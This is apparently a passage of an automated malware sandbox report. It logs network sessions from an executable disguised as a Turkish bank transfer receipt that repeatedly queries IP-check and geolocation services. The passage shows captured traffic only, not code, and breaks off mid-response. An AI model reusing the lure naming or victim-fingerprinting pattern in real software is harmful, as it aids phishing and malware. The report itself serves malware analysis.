0	192.168.2.9	49740	193.122.130.0	80	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:11:12.903517962 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:11:13.489903927 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cd787a8027a247e856691415b72b0e92 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 19:11:13.501991034 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 19:11:13.621144056 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bfbb2b0e23f67211411df616321e693f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 19:11:14.591037035 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 19:11:14.715017080 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2fbfb24ba938507dad0c0d13cca9a795 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49759	193.122.130.0	80	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:11:15.685906887 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 19:11:16.414019108 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a6bc68389750b4224a010adc5316a9e8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49772	193.122.130.0	80	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:11:17.149856091 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:11:17.616458893 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a13a1553d1c957d8bda3c59a6061ea19 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49779	193.122.130.0	80	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:11:18.269928932 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:11:19.105428934 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9b88335d468f53a7d10d95d449861cc7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49791	193.122.130.0	80	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:11:19.758454084 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:11:20.783092976 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 581ac2884111685c6e2a42f7b0a10602 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49803	193.122.130.0	80	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:11:21.408577919 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:11:22.672903061 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b838843ecaa15b131d8e880e67746f76 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49815	193.122.130.0	80	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:11:23.339570045 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:11:23.846915960 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9d46baaf6e1c87d3401e0f89d6247035 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49824	193.122.130.0	80	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:11:24.467888117 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:11:25.754412889 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 06af950263c137f91368c9447304825d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49746	104.21.96.1	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:14 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 18:11:14 UTC	867	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761063 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fa7NCOpDrWhbwb7WmnoKKOTNcV%2B6Hgz1J8%2BAJvI91mbutK4Nv%2Fr4CJI8gvLjWj%2FFmMGta97hY2ZzAUPn6KjwG%2B9Dj8mI%2B%2F0vVubUWQs5AGivYlSEBwlFnT%2B6CsaiJwvWOVQ4uqfx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff6637f8924de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1565&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1783750&cwnd=209&unsent_bytes=0&cid=dcc77dad92f2f29b&ts=292&x=0"
2025-01-09 18:11:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49752	104.21.96.1	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:15 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 18:11:15 UTC	854	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761064 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UBhgjvfycPPnknrU2Ppberx9OdGkW8fh3Z9w6RIxyGZ07Cl6Lc9PPu%2FdWdOsrGDgiFSUC8K5Chd5h%2BWIKss5AkBXptfxRjVjv4QEwsUZTA34j9xCrvCEbaJr8Fkj9WKSjn3uah90"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff663869d5cc32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2560&min_rtt=1678&rtt_var=1259&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1740166&cwnd=178&unsent_bytes=0&cid=6e011e5cfbd66145&ts=153&x=0"
2025-01-09 18:11:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49766	104.21.96.1	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:16 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 18:11:17 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761066 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBEALmdnTZG9N4%2B2MmALGBiVIyzZZOX3mwp3jDHi2vOMi07g1qTxSH9naFHnqePFq8VwFr6uX076B6HBj%2Bq6RPzpfuLgkCGaQa2YrO%2BeggCnf%2FUbQ3ILox7ydZQzw1wprWXn%2Fvmx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff6638fa86e4363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1597&rtt_var=634&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1681059&cwnd=240&unsent_bytes=0&cid=033bd11be59171a9&ts=243&x=0"
2025-01-09 18:11:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49773	104.21.96.1	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:18 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 18:11:18 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761067 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kOmI2vlYSZN3%2FZOPWiiXXOY%2F2KX%2FhC9Xvg7j3I41ZH9GTHfvU7vBUrwd6thlJHbJ4WKFrVwqoZvFYDWZwbef0Nx%2FJDvZ9ofzGw1zIgyIJ09gajcrlqdZMjjhpbqFOxU6DVqg%2FM8l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff66396bf241a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2196&min_rtt=2000&rtt_var=890&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1460000&cwnd=157&unsent_bytes=0&cid=f05bcedf1d28c105&ts=141&x=0"
2025-01-09 18:11:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49785	104.21.96.1	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 18:11:19 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761068 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8XxlI5fpeJ3h8gcGc3LAKsvuwnEJDSW7WMExOKKXzRGlEVo%2FbuHAhRAeslZwLb7KSIXY3bmD%2FEXhm27YqiGmEtR5Ifqy0abYTEpLIuxctMwCnkJq02btRAJjSRYZ5CC7ZYC%2FvQL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff6639ffbfe72a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1936&rtt_var=739&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1467336&cwnd=212&unsent_bytes=0&cid=5e25bf241aba543e&ts=154&x=0"
2025-01-09 18:11:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49797	104.21.96.1	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:21 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 18:11:21 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761070 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJ%2B0rQm0NkKFgxXJJ95tbx9ISO2jRI%2B2t5sSI7xdHYdN0mS6N4lQPgEHFKp2mvGk5BR9sTARhDpTP76J%2BI9XoOTWNHYmg38D39XWKm0I0Kffp5ZP9FQEpP5bcAISd5IjnzpvZnPv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff663aa5b65c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: 